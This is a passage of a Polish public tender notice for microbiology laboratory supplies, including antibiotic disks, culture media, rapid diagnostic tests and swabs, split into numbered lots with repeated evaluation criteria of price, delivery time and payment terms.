30ug a` 50 krążków	op. 8<br/>40.	Lewofloksacyna 5ug a`50 krążków	op. 4<br/>41.	Norfloksacyna 10ug a` 50 krążków	op. 20<br/>42.	Ciprofloksacyna 5ug a` 50 krążków	op. 20<br/>43.	Vankomnycyna 5 mg a’50 krążków	op. 20<br/>44.	Rifampicyna 5ug a` 50 krążków	op. 5<br/>45.	Linezolid 10 ug a` 50 krążków	op. 5<br/>46.	Fusidic acid 10 ug a` 50 krążków	op. 2<br/>47.	Mupirocyna 200 ug a`50 krążków	op. 2<br/>48.	Kotrimoksazol 1,25/23,75ug a` 50 krążków	op. 20<br/>49.	Krązki czyste	op. 6<br/>50.	Kwas nalidyksowy	op. 2<br/>51.	Chloramfenikol 30ug a` 50 krążków	op. 2<br/>52.	Fosfomycyna 200ug a` 50 krążków	op. 2<br/>53.	Cefinaza (paski ) a` 50 pasków	op. 2<br/>54.	Optochina a`&#39;50 krążków	op. 10<br/>55.	Novobiocin a&#39;50 krążków	op. 6<br/>56.	Furazolidon a` 50 krążków	op. 8<br/>57.	Cefiderocol a&#39; 50 krążków <br/>58.	Tobramycyna 10 ug a&#39; 50 krążków	op. 20<br/>59.	&#34;X - krążki diagnostyczne z heminą do różnicowania pałeczek<br/>z rodzaju Haemophilus a` 50 krążków.&#34;	op. 2<br/>60.	V - krążki i NAD do różnicowania pałeczek z rodzaju Haemophilus a` 50 krążków	op. 2<br/>61.	Krążki BC	op. 4<br/>62.	BVX - krążki diagnostyczne z bacytracyną, heminą i NAD do wykrywania i izolacji pałeczek z rodzaju Haemophilus a` 50 kr.	op. 10<br/>63.	Muller-Hinton II agar, op. 10 szt.	op. 540<br/>64.	Muller-Hinton II agar + 5% KK + NAD, op. 10 szt.	op. 40<br/>65.	Muller-Hinton II agar + 5% KB, op 10 szt.	op. 4<br/>66.	Chromogenne dla ESBL , op. 10 szt	op. 72<br/>67.	Chromogenne dla S.agalactiae, op. 10 szt.	op. 60<br/>68.	Chromogenne dla MRSA, op. 10 szt.	op. 72<br/>69.	Chromogenne dla VRE, op.10 szt.	op. 72<br/>70.	Chromogenne do bezpośredniej hodowli oraz identyfikacji min. 4 gatunków Candida w tym : C.albicans, C.krusei, C. glabrata, C. tropicalis., op. 10 szt.	op. 10<br/>71.	Czekolada agar + czynniki V i X, op. 10szt.	op. 20<br/>72.	Columbia agar + 5%krew barania, op. 10szt.	op. 360<br/>73.	Columbia CNA +5% krew barania, op. 10szt.	op. 20<br/>74.	Dwudzielne:Columbia agar + 5%krew barania/MC+FK, op. 10szt.	op. 360<br/>75.	Podłoże wybiórczo różnicujące dla enterokoków, op. 10szt.	op. 72<br/>76.	Mac Conkey agar z fiolotem krystalicznym MC+FK, op. 10szt.	op. 400<br/>77.	MacConkey agar z sorbitolem , op. 10szt.	op. 4<br/>78.	Sabourouda + chloramfenikol + genta, op. 10szt.	op. 36<br/>79.	SS agar, op. 10szt.	op. 40<br/>80.	Mannitol agar dla gronkowców, op. 10szt.	op. 40<br/>81.	Podłoże do hodowli Yersinia(CIN)	op. 20<br/>82.	Schaedler Anaerobe Agar z krwią baranią z heminą i witaminą K1	op. 72<br/>83.	Test płytkowy do oznaczania lekowrażliwości grzybów chorobotwórczych, minimum 8 antybiotyków, zgodnie z EUCAST, odczyt manualny (kompletny zestaw)	szt.	15<br/>3B	Podłoża do hodowli drobnoustrojów z krwi i płynów infuzyjnych <br/>1.	Podłoże do hodowli drobnoustrojów beztlenowych z inhibitorem antybiotyku	szt.	3500<br/>2.	Podłoże do hodowli drobnoustrojów tlenowych z inhibitorem antybiotyku	szt.	3500<br/>3.	Podłoże do hodowli drobnoustrojów z płynów fizjologicznie jałowych, uzyskanych w ilości od 0,5 do 3 ml (pediatryczne)	szt.	150<br/>4.	Aparat dzierżawa	msc	36<br/>5	&#34;Igła Multifly 21G 0,8mm/19mm zielony<br/>wielkość op. 120 szt .&#34;	szt.	4000<br/>6	&#34;Adapter BCF do posiewu<br/>( wielkość op. 20 szt. )&#34;	szt.	4000<br/>3C	Aparat do barwienia wraz z odczynnikami <br/>1.	Dzierżawa aparatu do barwienia	msc	36<br/>2.	Odczynniki do barwienia	op. 36 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">38434000-6 - Analizatory</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%, termin dostawy 20%, termin płatności 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> L.P	Nazwa produktu	j.m/ilość	<br/>1.	Benzypenicylina op.	3<br/>2.	Ampicylina op.	3<br/>3.	Amoxycylina/klawulanian op.	3<br/>4.	Ampicylina/Sulbaktam	op.	5<br/>5.	Piperacylina/Tazobaktam	op.	4<br/>6.	Ceftazydym	op.	6<br/>7.	Ceftazydym/Abivactam	op.	4<br/>8.	Cefotaksym op.	6<br/>9.	Ceftriakson	op.	4<br/>10.	Metronidazol op.	3<br/>11.	Vankomycyna op.	16<br/>12.	Teicoplanina	op.	2<br/>13.	Klindamycyna	op.	2<br/>14.	Imipenem op.	6<br/>15.	Imipenem/Relobactam	op.	3<br/>16.	Meropenem	op.	6<br/>17.	Meropenem /waborvaktam	op.	2<br/>18.	Ciprofloksacyna	op.	6<br/>19.	Fosfomycyna op.	36<br/>20.	Tygecyklina	op.	3<br/>21.	Aztreonam	op.	5<br/>22.	Levofloksacyna	op.	4 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%, termin dostawy 20%, termin płatności 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nazwa artykułu	j.m./Ilość	<br/>Agarki amerykańskie słupek szt.	200<br/>Podłoże Fastidious Anaerobe Agar+ 5% odwłókniona krew końska szt.	300<br/>Podłoże indolowo-mocznikowe 3 ml	szt.	200<br/>Podóże z malonianem sodu	szt.	60<br/>EDTA	szt.	6<br/>Kwas fenyloboronowy	szt.	6<br/>Mueller Hinton + kloksacylina	szt.	200<br/>TS bulion w probówce 10 ml	szt.	200<br/>Schaedler Bulion z wit K i Heminą w probówkach 10 ml	szt.	400<br/>Sf bulion w probówkach 5 ml szt.	300<br/>Tood Hewit bulion z colistyną i kwasem nalidyksowych w probówkach 5 ml	szt.	300<br/>KOH15% a 5ml + DMSO	szt.	5<br/>KOH 3% a,5ml	szt.	5<br/>1% woda peptonoowa z trptofanem (3 ml) w probówce szklanej	szt.	60<br/>Odczynnik Erlicha	szt.	3<br/>Sabouraud Dextrose/Fungisel Agar	szt.	20 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%, termin dostawy 20%, termin płatności 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nazwa produktu	j.m/ilość	<br/>Zestaw odczynników poliwalentnych dla grupy EPEC A, B, C	op.	3<br/>Antygen kontrolny dla grupy EPEC A, B, C	op.	3<br/>Surowica Salmonella dla antygenu HM	op.	3 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%, termin dostawy 20%, termin płatności 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nazwa produktu	j.m/ilość	<br/>Test rozcieńczeniowy do oznaczania MIC Kolistyny (płytkowy), 0,25-16. Płytka z 7 zakresami stężeń,8 kontrolna. Kompletny zestaw (test+bulion namnażający), opakowanie 16 testów opk.	10<br/>Testy stwierdzające obecność antygenów rota-adeno, noro/astowirusów w próbkach kału, test kasetkowy, opakowanie 20 testów opk.	40<br/>Testy stwierdzające obecność antygenów Legionella pneumophila wielkość opakowania 12 testów, testy immunochromatoficzne	opk.	3<br/>Test kasetkowy do wykrywania paciorkowsców grupy A w wymazach z gardła, wielkość opakowania 20 testów, testy immunochromatoficzne	opk.	10<br/>Testy stwierdzające obecność antygenu Lamblia intestinalis, test kasetkowy, wielkość opakowania 10 testów	opk.	12<br/>Testy immunochromatograficzne stwierdzające obecność antygenów S.pneumoniae w moczu a&#39;12 testów	opk.	9<br/>Immunochromatograficzny test do jakościowego wykrywania swoistych antygenów Campylobacter (C. coli, C. jejuni)w ludzkim kale, 30 testów opakowanie opk.	8<br/>Testy immunochromatoficzne do wykrywania przeciwciał IgG/IgM/ anty Treponema pallidum w surowicy/osoczu-opakowanie 25 testów	opk.	25<br/>Testy immunochromatoficzne do wykrywania antygenu H. Pylori, op. 25 testów opk.	10<br/>Test immunochromatograficzny do wykrywania antygenów Grypa A/Grypa B/COVID-19/ RSV/ Adenowirus/Mycoplasma pneumoniae	opk.	30<br/>Test immunochromatograficzny do wykrywania przeciwciał IgM skierowanych przeciwko antygenom Mycoplasma pneumoniae z surowicy krwi lub próbki krwi pobranej z palca, opakowanie 20 testów opk.	10<br/>Szybki test diagnostyczny do wykrywania karbapenemaz IMP, OXA-48, KPC, NDM i VIM z kolonii bakteryjnej, opakowanie 20 testów. Czułość i specyficznośc względem metody molekularnej 100%	opk.	8<br/>Szybki test diagnostyczny do wykrywania karbapenemaz dla A.baumannii z kolonii bakteryjnej, opakowanie 20 testów. Czułość i specyficznośc względem metody molekularnej 100%	opk.	5<br/>Testy lateksowe do wykrywania antygenów bakteryjnych w płynie mózgowo-rdzeniowym	opk.	2<br/>Testy stwierdzające obecność toksyny A i B C.difficile szybki test immunoenzmatyczny na kasetkach po 25 kasetek ; czułość: toksyna A – 0,63 ng/ml, toksyna B – 1,25 ng/ml, kontrola dodatnia w zestawie	opk.	24<br/>Test do wykrywania antygenów Grypa A/Grypa B/COVID-19/ RSV w wymazach z nosa/nosogardła, test immunochromatograficzny 25 szt.	opk.	20 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%, termin dostawy 20%, termin płatności 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nazwa produktu	j.m./ilość	<br/>Probówki do analizy parazytologicznej kału w kierunku pasożytów Zestawy jednorazowego użytku / bez konieczności mycia.Probówki gotowe do użycia, wypełnione fabrycznie odczynnikami. Probówki nie zawierają formaliny, alkoholu oraz metali ciężkich. Obecne dwa filtry przesiewowe umożliwiające łatwą separację jaj, larw, cyst i odczyt pasożytów. Nie ma konieczności stosowania octanu etylu, kompatybilne z wirówkami na rotor max 15 ml, zestaw zawiera max 150 szt. probówek	szt	500 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%, termin dostawy 20%, termin płatności 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nazwa artykułu	j.m./Ilość	<br/>Pałeczka plastikowa klasy IIa jałowa z wacikiem dakronowym w probówce o średnicy 13 mm szt.	1 000<br/>Wymazówka z nylonową końcówką mini do wymazów z nosogardzieli	szt	2 000<br/>Wymazówka z nylonową końcówką mini– pediatryczna	szt	2 000<br/>Pałeczka plastikowa jałowa, wacik bawełniany pakowany pojedynczo bez probówki transportowj	szt	100<br/>Wymazówka jałowa klasy IIa w probówce o śr. 13mm z podłożem transportowym Amies z węglem aktywnym, z aplikatorem plastikowym, o długości 150-170mm, z wacikiem wiskozowym. Instrukcja pobrania materiału w języku polskim na każdej wymazówce. Udokumentowana zmiana liczby jednostek tworzących kolonię dla min. 7 klinicznie spotykanych mikroorganizmów w okresie do 72 godz. od dokonania poboru (załączyć dokument do oferty) szt.	4 000<br/>Jałowe pojemniki do badań mikrobiologicznych a`25 ml, osobno pakowane, każdy pojemnik musi posiadać datę ważności.	szt.	3 000<br/>Jałowe kałówki	szt.	2 000<br/>Ezy bakteriologiczne, PS, jałowe na 10ul zakończone igłą, w opakowaniu 20 szt. - dołączyć dokument potwierdzający pojemność ezy	op.	1 000<br/>Ezy bakteriologiczne, PS, jałowe na 1ul zakończone igłą, w opakowaniu 20 szt.- dołączyć dokument potwierdzający pojemność ezy	op.	700<br/>Szkiełka podstawowe cięte krawędzie gładkie grubość 2mm (a&#39;25sztuk)	op.	40<br/>Szkiełka podstawowe szlifowane, z polem do opisu,grubość 1mm a&#39; 25 szt	op.	30<br/>Szkiełka nakrywkowe 24mm/24 mm a&#39; 1000 szt	op.	4<br/>Sterylne probówki z korkiem śr 16 wys 10 a&#39; 200 szt	op.	50<br/>Sterylne probówki z korkiem pojemność 5 ml średnica 12, wysokość 92.a&#39;100 szt op.	30<br/>Sterylne pipety pasteurowskie pakowane osobno 3 ml	szt	3 000<br/>Sterylne końcówki do pipet automatycznych a&#39;200 ul a&#39; 96 szt	szt	2<br/>Bagietka plastikowa 4/120mm a&#39;100sztuk	op.	10<br/>wymazówki flok w probówce  opk po 100 sztuk	op.	20<br/>&#34;Końcówki epT.I.P.S.® Standard<br/>0,1-10 µl 2x500&#34;	op.	6<br/>&#34;Końcówki epT.I.P.S.® Standard<br/>2-200 µl 2x500&#34;	op.	6<br/>&#34;Końcówki epT.I.P.S.® Standard<br/>50-1000 µl 2x500&#34;	op.	6<br/>&#34;Probówki Eppendorf 1,5 ml Safe<br/>Lock 1000 szt.&#34;	op.	3 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%, termin dostawy 20%, termin płatności 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> &#34;Acetonitril 50%, Water 47.5 %<br/>and<br/>Trifluoroacetic acid 2.5% 250ML<br/>Honeywell 19182&#34;	op	3 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%, termin dostawy 20%, termin płatności 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, 